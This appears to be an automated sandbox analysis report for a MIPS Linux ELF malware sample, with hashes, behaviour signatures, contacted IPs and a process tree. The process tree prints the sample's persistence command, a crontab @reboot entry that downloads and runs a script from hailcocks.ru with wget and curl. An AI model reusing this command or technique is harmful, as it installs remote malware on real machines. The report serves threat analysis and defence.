Analysis
-
max time kernel
150s -
max time network
149s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28-10-2024 01:07
Static task
static1
Behavioral task
behavioral1
Sample
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
Resource
debian9-mipsbe-20240611-en
General
-
Target
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
-
Size
99KB
-
MD5
2bc1855eb4297c28116e412b6705e14a
-
SHA1
4d8189399c887b335e1d690961e38b806948d9cd
-
SHA256
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
-
SHA512
1074aa161b94e13c473e8cf23d6bbd6baa531854b4c110b8142ccd8e8296b6a94751e55907f9ed6aff7d1b470676c81ea5754fdfeef14f8829dc9a5e3452d26e
-
SSDEEP
1536:uo6JSd6vTfjZ0IonWnP4MmBGSBGxJGSnuqMLHRvMNswe+fYgHIRyyR:upP5ld4MaqMjRUKuYRyyR
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elfpid process 705 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 139.84.165.176 Destination IP 185.181.61.24 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.22OlBk crontab -
Changes its process name 1 IoCs
Processes:
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself mini_httpd 705 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf -
Processes:
crontab0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elfcrontabdescription ioc process File opened for reading /proc/filesystems crontab File opened for reading /proc/mounts 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/724/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/730/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/718/cmdline 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/725/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/708/cmdline 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/727/cmdline 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/filesystems crontab File opened for reading /proc/727/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/1/cmdline 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/728/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/729/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/731/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/726/status 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf File opened for reading /proc/2/cmdline 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
Processes
-
/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf1⤵
- Renames itself
- Changes its process name
- Reads runtime system information
PID:705 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:709 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:712
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:713
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD57f870874f6e2e8a519bfb12fd9595bae
SHA1a06aa499becd5f448356d6dcd76441142f5f4142
SHA25609cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d
SHA512f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620